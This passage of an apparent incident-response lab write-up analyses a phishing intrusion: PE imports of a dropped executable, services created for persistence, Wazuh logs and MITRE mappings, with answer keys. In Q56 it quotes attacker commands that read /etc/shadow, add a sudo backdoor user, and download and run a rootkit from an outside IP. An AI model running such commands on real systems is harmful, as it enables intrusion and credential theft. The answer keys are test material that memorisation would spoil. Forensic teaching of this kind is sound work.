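# Token order matters: Edge and Opera embed "Chrome/" and "Safari/", Chrome embeds
# "Safari/", so the most specific token is tested first.
UA_RULES = [
    ("Microsoft Edge", ("Edg/", "Edge/", "EdgA/", "EdgiOS/")),
    ("Opera", ("OPR/", "Opera/")),
    ("Mozilla Firefox", ("Firefox/",)),
    ("Internet Explorer", ("Trident/", "MSIE ")),
    ("Google Chrome", ("Chrome/", "CriOS/")),
    ("Safari", ("Safari/",)),
]


def browser_from_ua(ua):
    for browser, tokens in UA_RULES:
        if any(tok in ua for tok in tokens):
            return browser
    return "unknown"


def answer_timestamp(iso_time):
    """Render a frame time as the MM-DD-YYYY-HH:MM:SS answer format, normalised to UTC."""
    ts = datetime.fromisoformat(iso_time).astimezone(timezone.utc)
    return ts.strftime("%m-%d-%Y-%H:%M:%S")


def summarise(payload, frame_time):
    req = parse_request(payload)
    ua = req["headers"].get("user-agent", "")
    return {"downloaded": req["filename"], "host": req["headers"].get("host"),
            "browser": browser_from_ua(ua), "when": answer_timestamp(frame_time)}


if __name__ == "__main__":
    print(summarise(REQUEST, FRAME_TIME))
```

The User-Agent is client-supplied and trivially spoofed, which is why the Sysmon file-creation events from chrome.exe above matter: they corroborate the browser identification from the host side rather than relying on the header alone.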

Q44

On WKS-RSCH01, which of the following Windows libraries is imported by the executable dropped/downloaded by the macro-enabled Word document?

USER32.dll

KERNEL32.dll

NETAPI32.dll

ADVAPI32.dll

cd "C:\Users\Administrator\Desktop\Evidence\PCAPs\e"
& "C:\Users\Administrator\Desktop\Tools\pestudio\pestudio.exe" dochelp.exe

pestudio is a GUI tool, so launching it this way prints nothing to the console (the answer sits in its imports view). As a console fallback, inspect the binary from PowerShell:


Get-Location
Get-ChildItem dochelp.exe


$file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
$bytes = [System.IO.File]::ReadAllBytes($file)
$text = [System.Text.Encoding]::ASCII.GetString($bytes)

Write-Host "Checking for imported DLLs:"
Write-Host "USER32.dll: " $text.Contains("USER32.dll")
Write-Host "KERNEL32.dll: " $text.Contains("KERNEL32.dll")
Write-Host "NETAPI32.dll: " $text.Contains("NETAPI32.dll")
Write-Host "ADVAPI32.dll: " $text.Contains("ADVAPI32.dll")

Write-Host "`nCase-insensitive search:"
Write-Host "user32: " ($text -match "(?i)user32\.dll")
Write-Host "kernel32: " ($text -match "(?i)kernel32\.dll")
Write-Host "netapi32: " ($text -match "(?i)netapi32\.dll")
Write-Host "advapi32: " ($text -match "(?i)advapi32\.dll")


Write-Host "`nAll DLL references found:"
$text -split "`0" | Where-Object { $_ -match "\.dll" } | Select-Object -Unique

Or, with Sysinternals strings.exe available, strings -n 6 dochelp.exe | findstr /i "\.dll". Note that Get-Content -Encoding Byte exists only in Windows PowerShell 5.1 (PowerShell 7 uses -AsByteStream), so a version-independent one-liner is:

[System.Text.Encoding]::ASCII.GetString([System.IO.File]::ReadAllBytes("C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe")) -split "[^\x20-\x7e]+" | Where-Object { $_ -match "\.dll$" } | Sort-Object -Unique

The output confirms that dochelp.exe imports KERNEL32.dll. This is visible in multiple ways:

  1. Direct check: KERNEL32.dll: True
  2. Case-insensitive search: kernel32: True
  3. String extraction: Shows "KERNEL32.dll" in the PE file
  4. Raw hex dump: Shows the import table contains "KERNEL32.dll" along with imported functions like ExitProcess and VirtualAlloc

Answer:

KERNEL32.dll

Q45

Specify the name of the API function imported by the executable that is downloaded by the macro-enabled Word document that may be used for memory allocation. Answer Format: Provide the exact function name as it appears in PEStudio.

This is clearly visible in the PE import table from the strings output:

KERNEL32.dll  XVirtualAlloc  ExitProcess

And also in the raw dump:

ExitProcess XVirtualAlloc  KERNEL32.dll

VirtualAlloc is a Windows API function from KERNEL32.dll that reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. It's commonly used by malware to allocate memory for shellcode execution, which aligns with the malicious behavior observed in this attack.

Answer:

VirtualAlloc
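A substring hit only shows that a DLL name is somewhere in the file; the defensible check for Q44 and Q45 is to walk the PE import directory itself. The Python parser below is an added example, not code from this write-up or from PEStudio: it follows the import descriptors (PE32 and PE32+, by-name and by-ordinal entries) and returns each imported DLL with its functions, translating RVAs to raw file offsets on the way. build_sample_pe() constructs a tiny synthetic PE32 so the parser runs offline; pointing parse_imports() at a real sample reproduces the KERNEL32.dll / VirtualAlloc result.

```python
import struct

SEC_VA, SEC_RAW = 0x1000, 0x200   # RVA and raw file offset of the constructed .idata section

def build_sample_pe() -> bytes:
    """Constructed PE32 image (not dochelp.exe) with a single hand-laid-out .idata section."""
    sec = bytearray(0x200)
    put = lambda off, blob: sec.__setitem__(slice(off, off + len(blob)), blob)
    rva = lambda off: SEC_VA + off                                  # section offset -> RVA
    put(0x80, b"KERNEL32.dll\0"); put(0x90, b"USER32.dll\0")
    for off, func in ((0xA0, b"VirtualAlloc\0"), (0xB0, b"ExitProcess\0"), (0xC0, b"MessageBoxA\0")):
        put(off, struct.pack("<H", 0) + func)                       # IMAGE_IMPORT_BY_NAME: hint, name
    k32 = struct.pack("<3I", rva(0xA0), rva(0xB0), 0)               # import name table, zero-terminated
    u32 = struct.pack("<3I", rva(0xC0), 0x80000001, 0)              # second entry imports ordinal 1
    put(0x40, k32); put(0x60, k32); put(0x50, u32); put(0x70, u32)  # OriginalFirstThunk and FirstThunk (IAT) copies
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    put(0x00, struct.pack("<5I", rva(0x40), 0, 0, rva(0x80), rva(0x60)))
    put(0x14, struct.pack("<5I", rva(0x50), 0, 0, rva(0x90), rva(0x70)))   # all-zero descriptor at 0x28 ends the list
    hdr, pe = bytearray(SEC_RAW), 0x80
    hdr[:2], hdr[pe:pe + 4] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, pe)                           # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, pe + 4, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # COFF: i386, 1 section, 224-byte opt header
    opt = pe + 24
    struct.pack_into("<H", hdr, opt, 0x10B)                         # PE32 magic
    struct.pack_into("<II", hdr, opt + 96 + 8, rva(0), 0x3C)        # DataDirectory[1] = import table (RVA, size)
    sh = opt + 0xE0
    hdr[sh:sh + 8] = b".idata\0\0"
    struct.pack_into("<IIII", hdr, sh + 8, len(sec), SEC_VA, len(sec), SEC_RAW)  # VirtualSize, VA, SizeOfRawData, PointerToRawData
    return bytes(hdr + sec)

def _cstr(data: bytes, off: int) -> str:
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")

def parse_headers(data: bytes):
    """Return (optional header offset, magic, [(va, size, raw_ptr), ...]); raises if this is not a PE image."""
    pe = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if pe < 0 or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    sections = []
    for i in range(nsec):                                           # section headers follow the optional header
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, max(vsize, rawsize), rawptr))
    return opt, struct.unpack_from("<H", data, opt)[0], sections

def rva_to_offset(sections, rva: int) -> int:
    """Translate an RVA into a raw file offset (the offsets quoted for Q46 are file offsets, not RVAs)."""
    hit = next((rva - va + raw for va, size, raw in sections if va <= rva < va + size), None)
    if hit is None:
        raise ValueError(f"RVA {rva:#x} is not backed by any section")
    return hit

def parse_imports(data: bytes) -> dict:
    """Walk the import directory; returns {dll_name: [function_name or 'ordinal#N', ...]}."""
    opt, magic, sections = parse_headers(data)
    layout = {0x10B: (96, "<I", 1 << 31), 0x20B: (112, "<Q", 1 << 63)}   # PE32 / PE32+: data dir offset, thunk fmt, ordinal flag
    if magic not in layout:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dd_off, fmt, ord_flag = layout[magic]
    imp_rva = struct.unpack_from("<I", data, opt + dd_off + 8)[0]  # DataDirectory[1].VirtualAddress
    if imp_rva == 0:
        return {}                                                   # no import table at all
    imports, desc = {}, rva_to_offset(sections, imp_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<5I", data, desc)
        if oft == 0 and name_rva == 0 and ft == 0:
            break
        thunk, funcs = rva_to_offset(sections, oft or ft), []       # prefer the unbound name table
        while (entry := struct.unpack_from(fmt, data, thunk)[0]) != 0:
            if entry & ord_flag:
                funcs.append(f"ordinal#{entry & 0xFFFF}")
            else:
                funcs.append(_cstr(data, rva_to_offset(sections, entry) + 2))   # skip the 2-byte hint
            thunk += struct.calcsize(fmt)
        imports[_cstr(data, rva_to_offset(sections, name_rva))] = funcs
        desc += 20
    return imports

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for dll, funcs in parse_imports(blob).items():
        print(f"{dll}: {', '.join(funcs)}")
```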

Q46

Which file offset found in the executable downloaded by the macro-enabled Word document indicates that the malware sets its own browser identity when connecting to external infrastructure?

0x000013A0

0x000018FA

0x0000200C

0x00001C3F
$file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
$bytes = [System.IO.File]::ReadAllBytes($file)

$offsets = @(0x13A0, 0x18FA, 0x200C, 0x1C3F)

foreach ($offset in $offsets) {
    Write-Host "`n=== Offset: 0x$($offset.ToString('X')) ==="
    $start = $offset
    $length = 100
    if ($start + $length -gt $bytes.Length) {
        $length = $bytes.Length - $start
    }
    $chunk = $bytes[$start..($start + $length - 1)]
    $text = [System.Text.Encoding]::ASCII.GetString($chunk)
    Write-Host "ASCII: $text"
}

$fullText = [System.Text.Encoding]::ASCII.GetString($bytes)
$uaIndex = $fullText.IndexOf("Mozilla/5.0")
if ($uaIndex -ge 0) {
    Write-Host "`n=== User-Agent found at offset: 0x$($uaIndex.ToString('X')) ==="
}
PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e> $file = "C:\Users\Administrator\Desktop\Evidence\PCAPs\e\dochelp.exe"
>> $bytes = [System.IO.File]::ReadAllBytes($file)
>>
>> $offsets = @(0x13A0, 0x18FA, 0x200C, 0x1C3F)
>>
>> foreach ($offset in $offsets) {
>>     Write-Host "`nOffset: 0x$($offset.ToString('X'))"
>>     $start = $offset
>>     $length = 150
>>     if ($start + $length -gt $bytes.Length) {
>>         $length = $bytes.Length - $start
>>     }
>>     $chunk = $bytes[$start..($start + $length - 1)]
>>     $text = [System.Text.Encoding]::ASCII.GetString($chunk)
>>     $hex = ($chunk | ForEach-Object { $_.ToString("X2") }) -join " "
>>     Write-Host "Hex: $($hex.Substring(0, [Math]::Min(150, $hex.Length)))"
>>     Write-Host "Text: $($text.Substring(0, [Math]::Min(100, $text.Length)))"
>> }

Offset: 0x13A0
Hex: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Text:

Offset: 0x18FA
Hex: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 78 36 34 3B 20 72 76 3A 31 33 33 2E 30
Text: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 YSZM1?M1?SSI?:Vy?

Offset: 0x200C
Hex: 00
Text:

Offset: 0x1C3F
Hex: 00
Text:
PS C:\Users\Administrator\Desktop\Evidence\PCAPs\e>

Answer:

0x000018FA

Q47

How many new services did the attacker create on WKS-RSCH01?

4
1
2
3

Investigation Methods:

  • Sysmon Event ID 1 with sc.exe
  • Windows Event ID 7045 (Service Installation)
  • Registry modifications under Services key (Sysmon Event ID 13)

Query 1: Service Control Manager Events

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"7045"

Service 1:

  • Service Name: rnvikl
  • Image Path: cmd.exe /c echo rnvikl > .\pipe\rnvikl
  • Start Type: demand start
  • Time: July 14, 2025 @ 00:14:10.895
  • Event ID: 7045 (Service Control Manager)
  • Purpose: Named pipe privilege escalation

Service 2:

  • Service Name: wbJlQcNDIgji
  • Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
  • Start Type: auto start
  • Account: LocalSystem
  • Time: July 14, 2025 @ 01:06:06.046
  • Event ID: 7045 (Service Control Manager)
  • Purpose: Persistence mechanism

Query 2: Registry Modifications to Services Key

agent.name:"WKS-RSCH01" AND data.win.eventdata.targetObject:*Services* AND data.win.system.eventID:"13"

Service 3:

  • Service Name: YHZB
  • Registry Path: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath
  • Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
  • Time: July 14, 2025 @ 01:06:04.837 (2 seconds before wbJlQcNDIgji)
  • Event ID: 13 (Sysmon Registry Value Set)
  • Purpose: Persistence mechanism (created via direct registry modification)

Analysis:

The attacker created 3 distinct services using two different techniques:

  1. rnvikl - Created via Service Control Manager API
  2. YHZB - Created via direct registry modification (Event ID 13)
  3. wbJlQcNDIgji - Created via Service Control Manager API

Both YHZB and wbJlQcNDIgji point to the same p3rsist.exe executable but are separate service entries with different names. YHZB was created 2 seconds earlier via registry manipulation, while wbJlQcNDIgji was created through the standard Service Control Manager.

Answer:

3

Q48

What is the name of the Windows service used by the attacker for persistence? Answer Format: Provide the service name only. Provide the name exactly as it appears in logs or the registry.

This service was created at July 14, 2025 @ 01:06:06 with the following characteristics:

  • Image Path: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
  • Start Type: auto start (automatically starts at boot)
  • Account: LocalSystem (elevated privileges)

Answer:

wbJlQcNDIgji

Q49

Which Windows Registry path is used to store configuration information for system services?

HKEY_USERS.DEFAULT\Services

HKEY_CLASSES_ROOT\System\Services

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

This is the standard Windows Registry path where all system services are stored and configured. Each service has its own subkey under this path containing configuration information such as:

  • ImagePath (executable path)
  • Start (startup type)
  • Type (service type)
  • Description
  • Dependencies
  • And other service-specific settings

The other options are incorrect:

  • HKEY_USERS.DEFAULT\Services - Does not exist
  • HKEY_CLASSES_ROOT\System\Services - Does not exist
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - This is for user startup programs, not system services

Answer:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Q50

What is the full registry path where the malicious service YHZB is configured? Answer Format: Provide the full registry key path. For Example: HKLM\System\CurrentControlSet\Services\SERVICE

agent.name:"WKS-RSCH01" AND data.win.eventdata.targetObject:*YHZB*
input.type:log agent.ip:10.0.0.30 agent.name:WKS-RSCH01 agent.id:003 manager.name:WAZUH-SRV data.win.eventdata.image:C:\\Windows\\system32\\services.exe data.win.eventdata.targetObject:HKLM\\System\\CurrentControlSet\\Services\\YHZB\\ImagePath data.win.eventdata.processGuid:{9B0B9931-C076-6873-0A00-00000000ED03} data.win.eventdata.processId:732 data.win.eventdata.utcTime:2025-07-14 01:06:04.837 data.win.eventdata.details:\"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe\" rbgQAq data.win.eventdata.eventType:SetValue data.win.eventdata.user:NT AUTHORITY\\SYSTEM data.win.system.eventID:13 data.win.system.keywords:0x8000000000000000 data.win.system.providerGuid:{5770385F-C22A-43E0-BF4C-06F5698FFBD9} data.win.system.level:4 data.win.system.channel:Microsoft-Windows-Sysmon/Operational data.win.system.opcode:0 data.win.system.message:"Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-07-14 01:06:04.837 ProcessGuid: {9B0B9931-C076-6873-0A00-00000000ED03} ProcessId: 732 Image: C:\Windows\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath Details: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq User: NT AUTHORITY\SYSTEM" data.win.system.version:2 data.win.system.systemTime:2025-07-14T01:06:04.838170900Z data.win.system.eventRecordID:16257 data.win.system.threadID:2928 data.win.system.computer:WKS-RSCH01.aethergen.local data.win.system.task:13 data.win.system.processID:1224 data.win.system.severityValue:INFORMATION data.win.system.providerName:Microsoft-Windows-Sysmon rule.firedtimes:1 rule.mail:false rule.level:3 rule.description:Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\YHZB\\ImagePath binary is: \"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe\" rbgQAq rule.groups:sysmon, sysmon_eid13_detections, windows rule.mitre.technique:Windows Service rule.mitre.id:T1543.003 rule.mitre.tactic:Persistence, Privilege Escalation rule.id:92307 
location:EventChannel decoder.name:windows_eventchannel id:1752455165.3771274 timestamp:Jul 14, 2025 @ 01:06:05.811 _index:wazuh-alerts-4.x-2025.07.14

The registry modification shows:

  • TargetObject: HKLM\System\CurrentControlSet\Services\YHZB\ImagePath
  • Details: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
  • Time: July 14, 2025 @ 01:06:05.811

This reveals that YHZB is actually the same persistence service we saw earlier as "wbJlQcNDIgji" in the Event ID 7045 log. The service appears to have been created with the name "wbJlQcNDIgji" but the registry key is "YHZB" (possibly the service was renamed or there's a discrepancy in how it's registered).

Based on the registry path shown in the Sysmon Event ID 13 log:

Answer:

HKLM\System\CurrentControlSet\Services\YHZB
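Counting the services behind Q47 and Q50 means keying two sources on the service name, so that a service reported both by the Service Control Manager and by Sysmon is counted once. The Python below is an added example, not part of this write-up or of Wazuh: it merges Event ID 7045 installs with Sysmon Event ID 13 writes to Services\<name>\ImagePath, groups services that share a binary, and flags the ImagePath patterns seen on this host. The events are constructed from the values quoted on this page, and the 7045 field names (serviceName, imagePath, startType) are an assumption about how Wazuh flattens that event.

```python
import re

# Constructed alerts modelled on the Wazuh fields quoted on this page; the 7045 field names
# (serviceName, imagePath, startType) are an assumption about how Wazuh flattens that event.
SAMPLE_EVENTS = [
    {"agent.name": "WKS-RSCH01", "data.win.system.eventID": "7045", "timestamp": "2025-07-14T00:14:10.895",
     "data.win.eventdata.serviceName": "rnvikl", "data.win.eventdata.startType": "demand start",
     "data.win.eventdata.imagePath": r"cmd.exe /c echo rnvikl > .\pipe\rnvikl"},
    {"agent.name": "WKS-RSCH01", "data.win.system.eventID": "13", "timestamp": "2025-07-14T01:06:04.837",
     "data.win.eventdata.eventType": "SetValue",
     "data.win.eventdata.targetObject": r"HKLM\System\CurrentControlSet\Services\YHZB\ImagePath",
     "data.win.eventdata.details": r'"C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq'},
    {"agent.name": "WKS-RSCH01", "data.win.system.eventID": "13", "timestamp": "2025-07-14T01:06:06.040",
     "data.win.eventdata.eventType": "SetValue",
     "data.win.eventdata.targetObject": r"HKLM\System\CurrentControlSet\Services\wbJlQcNDIgji\ImagePath",
     "data.win.eventdata.details": r'"C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq'},
    {"agent.name": "WKS-RSCH01", "data.win.system.eventID": "7045", "timestamp": "2025-07-14T01:06:06.046",
     "data.win.eventdata.serviceName": "wbJlQcNDIgji", "data.win.eventdata.startType": "auto start",
     "data.win.eventdata.imagePath": r'"C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq'},
    # noise that must not count: a Services-key write that is not an ImagePath, and a service on another host
    {"agent.name": "WKS-RSCH01", "data.win.system.eventID": "13", "timestamp": "2025-07-14T01:07:00.000",
     "data.win.eventdata.eventType": "SetValue",
     "data.win.eventdata.targetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\NameServer",
     "data.win.eventdata.details": "10.0.0.1"},
    {"agent.name": "DC01", "data.win.system.eventID": "7045", "timestamp": "2025-07-14T01:08:00.000",
     "data.win.eventdata.serviceName": "Spooler", "data.win.eventdata.startType": "auto start",
     "data.win.eventdata.imagePath": r"C:\Windows\System32\spoolsv.exe"},
]

IMAGEPATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
USER_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)

def executable_of(image_path: str) -> str:
    """Strip arguments and quotes from an ImagePath so two services using the same binary compare equal."""
    p = image_path.strip()
    return (p[1:p.index('"', 1)] if p.startswith('"') else p.split()[0]).lower()

def new_services(events, host: str):
    """One record per distinct service name on `host`, merging 7045 installs with Sysmon 13 ImagePath writes."""
    found = {}
    for ev in events:
        if ev.get("agent.name") != host:
            continue
        eid = ev.get("data.win.system.eventID")
        if eid == "7045":
            name, image, src = ev["data.win.eventdata.serviceName"], ev["data.win.eventdata.imagePath"], "7045"
        elif eid == "13" and ev.get("data.win.eventdata.eventType") == "SetValue":
            m = IMAGEPATH_RE.search(ev.get("data.win.eventdata.targetObject", ""))
            if not m:
                continue                                    # other Services-key writes are not service creation
            name, image, src = m.group(1), ev["data.win.eventdata.details"], "sysmon13"
        else:
            continue
        rec = found.setdefault(name.lower(), {"name": name, "image_path": image, "sources": set(),
                                              "first_seen": ev["timestamp"]})
        rec["sources"].add(src)
        rec["first_seen"] = min(rec["first_seen"], ev["timestamp"])   # ISO timestamps sort lexically
    return sorted(found.values(), key=lambda r: r["first_seen"])

def shared_binaries(services):
    """Binaries registered under more than one service name, as {exe: [names]}."""
    by_exe = {}
    for s in services:
        by_exe.setdefault(executable_of(s["image_path"]), []).append(s["name"])
    return {exe: names for exe, names in by_exe.items() if len(names) > 1}

def suspicious_reasons(service) -> list:
    """Why an analyst should look at this service: interpreter ImagePath, named-pipe echo, user-profile binary."""
    path, exe, reasons = service["image_path"].lower(), executable_of(service["image_path"]), []
    if exe.endswith("cmd.exe") or exe.endswith("powershell.exe"):
        reasons.append("ImagePath runs a command interpreter instead of a service binary")
    if "\\pipe\\" in path:
        reasons.append("ImagePath writes to a named pipe (privilege escalation pattern)")
    if USER_PROFILE_RE.search(exe):
        reasons.append("service binary lives under a user profile")
    return reasons

if __name__ == "__main__":
    svcs = new_services(SAMPLE_EVENTS, "WKS-RSCH01")
    print(f"{len(svcs)} new service(s) on WKS-RSCH01")
    for s in svcs:
        print(s["first_seen"], s["name"], sorted(s["sources"]), suspicious_reasons(s))
```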

Q51

Which MITRE ATT&CK technique ID is best associated with writing password hash entries to a file for reuse or offline analysis?

T1110

T1555

T1003.008

T1546.001

T1110 - Brute Force

  • Description: Adversaries may use brute force techniques to gain access to accounts
  • This is about password guessing/cracking attempts, not dumping hashes

T1555 - Credentials from Password Stores

  • Description: Adversaries may search for common password storage locations to obtain credentials
  • This is about extracting passwords from password managers/stores, not hash dumping

T1003.008 - OS Credential Dumping: /etc/passwd and /etc/shadow

  • Description: Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking
  • This specifically covers extracting password hashes from shadow files for offline analysis

T1546.001 - Event Triggered Execution: Change Default File Association

  • Description: Persistence technique involving file associations
  • Not related to credential dumping

Answer:

T1003.008

Q52

On WKS-RSCH01, what MITRE ATT&CK technique rule is triggered when the VBA macro embedded in the Word document is executed?

T1204

T1059.005

T1566

T1059.001

T1204 - User Execution

  • User opens a file or clicks a link that executes malicious code
  • This fits! The user opened the Word document, triggering the macro

T1059.005 - Command and Scripting Interpreter: Visual Basic

  • Execution through VBA/VBScript
  • This also fits! The macro is written in VBA

T1566 - Phishing

  • Initial access through phishing emails/links
  • This is the delivery method, not the execution

T1059.001 - Command and Scripting Interpreter: PowerShell

  • Execution through PowerShell
  • This applies to what the macro calls, not the macro itself

Looking at the log entry again, when the VBA macro executes and spawns PowerShell, we need to identify what technique is triggered when the VBA macro is executed.

The VBA macro itself executing is:

  • T1059.005 - Command and Scripting Interpreter: Visual Basic

Answer:

T1059.005

Q53

Which MITRE ATT&CK technique ID corresponds to the use of the Windows Command Shell as the Command and Scripting interpreter for executing commands?

T1059.002

T1059.005

T1059.001

T1059.003

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Breaking down the sub-techniques under T1059:

  • T1059.001 - PowerShell
  • T1059.002 - AppleScript
  • T1059.003 - Windows Command Shell (cmd.exe)
  • T1059.005 - Visual Basic

Answer:

T1059.003

Q54

The delivery of a macro-enabled Word document via phishing, which drops an executable and establishes a reverse shell, is a behavior commonly seen in campaigns by:

APT37

Equation Group

TA505

APT33

Based on the attack behavior observed:

  1. Phishing delivery of macro-enabled Word document (.docm)
  2. VBA macro that downloads and executes a payload
  3. Drops executable (dochelp.exe) to establish persistence
  4. Credential dumping (mimikatz)
  5. AD enumeration (AdFind, PowerView)
  6. Data exfiltration (7z compression, FTP server)

This TTP chain is characteristic of TA505, a financially-motivated threat actor group known for:

  • Massive phishing campaigns delivering malicious Office documents
  • Macro-enabled documents that download secondary payloads
  • Use of legitimate tools for post-exploitation (mimikatz, AdFind, 7z)
  • FlawedAmmyy, SDBbot, and other custom malware
  • Ransomware deployment (Cl0p, Locky)
  • Credential theft and lateral movement
  • Data exfiltration operations

The other options are incorrect:

  • APT37 (North Korea) - Focuses on South Korean targets, uses different TTPs
  • Equation Group (NSA-linked) - Advanced persistent threats with sophisticated zero-days
  • APT33 (Iran) - Targets aerospace and energy sectors, different macro techniques

The combination of:

  • Mass phishing with Office macros
  • Simple executable droppers
  • Living-off-the-land tools (PowerShell, cmd.exe)
  • Credential dumping and exfiltration

This pattern strongly matches TA505's modus operandi.

Answer:

TA505

Q55

What should be the most immediate response action after discovering privilege escalation via named pipe impersonation on WKS-RSCH01?

Change/reset the credentials of the affected user

Reimage the domain controller

Review browser history for signs of phishing

Suspend the affected user session and isolate the endpoint

Analysis of options:

  1. Change/reset the credentials of the affected user
    • Important but not the most immediate action
    • Attacker already has SYSTEM-level access via named pipe impersonation
    • Credential reset doesn't stop active exploitation
  2. Reimage the domain controller
    • Extreme measure, not justified for workstation compromise
    • DC01 wasn't the compromised system
    • No evidence DC was compromised at this stage
  3. Review browser history for signs of phishing
    • Forensic activity, not immediate containment
    • Useful for investigation but doesn't stop active threat
  4. Suspend the affected user session and isolate the endpoint
    • IMMEDIATE CONTAINMENT action
    • Stops lateral movement to other systems
    • Prevents further data exfiltration
    • Cuts off attacker's active access
    • Preserves evidence for investigation

Given that we observed:

  • Active privilege escalation (named pipe at 00:14:09)
  • System-level access achieved
  • Credential dumping (mimikatz at 00:25:27)
  • Persistence mechanisms established
  • Data staging and potential exfiltration

The most immediate priority is containment to prevent further damage and lateral movement.

Answer:

Suspend the affected user session and isolate the endpoint

Q56

Based on available logs, which of the following sequences best represents the correct timeline of the attack on WEB-APP01?

Exploit Web App -> Local Enumeration -> Rootkit Installation -> User Creation -> Privilege Escalation

SSH brute force -> Privilege Escalation -> User Creation -> Rootkit Installation

SSH force -> Local Enumeration -> User Creation -> Persistence -> Rootkit Installation

SSH brute force -> Local Enumeration -> Privilege Escalation -> User Creation -> Rootkit Installation

From the bash history and Wazuh SIEM logs:

  1. SSH Brute Force (Initial Access)
    • Attacker gained access via SSH
    • IP: 18.212.186.186
    • Method: Likely password spray/brute force
  2. Local Enumeration (Discovery)
    • Command 1-8: System reconnaissance
    • whoami, id, cat /etc/passwd, cat /etc/shadow, ls -la, uname -a, ps aux
    • Checking user privileges, OS version, running processes
  3. Privilege Escalation (Privilege Escalation)
    • Command 9: sudo -l - Check sudo permissions
    • Command 10: sudo cat /etc/shadow - Escalated to view shadow file
    • Attacker leveraged sudo access
  4. User Creation (Persistence)
    • Command 14: sudo useradd -m -s /bin/bash sysadmin - Created new user
    • Command 15: sudo passwd sysadmin - Set password
    • Command 16: sudo usermod -aG sudo sysadmin - Added to sudo group
    • Created backdoor account with admin privileges
  5. Rootkit Installation (Defense Evasion)
    • Command 17: wget http://18.212.186.186:8080/rootkit.sh
    • Command 18: chmod +x rootkit.sh
    • Command 19: sudo ./rootkit.sh
    • Installed rootkit for persistent access and evasion

Answer:

SSH brute force -> Local Enumeration -> Privilege Escalation -> User Creation -> Rootkit Installation

Q57

When documenting attacker tools discovered during post-exploitation, which combination best reflects the tools and purpose used on WKS-RSCH01?

Macro-enabled document for initial access and a new service for persistence

Macro-enabled document for initial access and backdoor user for persistence

HTA payload for initial access and mimikatz for credential access

cmd.exe for malware delivery and explorer.exe for privilege escalation

Initial Access:

  • Macro-enabled Word document (AetherGen_SARS-CoV-3_Response_Plan.docm)
  • Delivered via phishing from attacker server (18.212.186.186)
  • Downloaded at 23:49:49, opened at 23:50:16
  • VBA macro executed PowerShell to download dochelp.exe

Post-Exploitation Tools:

  • dochelp.exe - Initial payload/dropper
  • AdFind.exe - AD enumeration
  • mimikatz.exe - Credential dumping (LSASS access at 00:25:27)
  • PowerView.ps1 - PowerShell AD enumeration
  • 7z.exe - Data compression for exfiltration

Persistence Mechanisms:

  • New services created:
    • rnvikl (named pipe privilege escalation)
    • YHZB (persistence service)
    • wbJlQcNDIgji (persistence service)
  • Service executable: p3rsist.exe running as LocalSystem with auto-start
  • NO backdoor user created on WKS-RSCH01 (backdoor user was only on WEB-APP01)

Credential Access:

  • mimikatz.exe - Dumped credentials from LSASS memory

Analyzing the options:

  1. Macro-enabled document for initial access and a new service for persistence
    • Correct: Macro document was initial access
    • Correct: Services (YHZB, wbJlQcNDIgji with p3rsist.exe) used for persistence
  2. Macro-enabled document for initial access and backdoor user for persistence
    • Backdoor user (sysadmin) was created on WEB-APP01, not WKS-RSCH01
  3. HTA payload for initial access and mimikatz for credential access
    • No HTA payload used; it was a .docm file
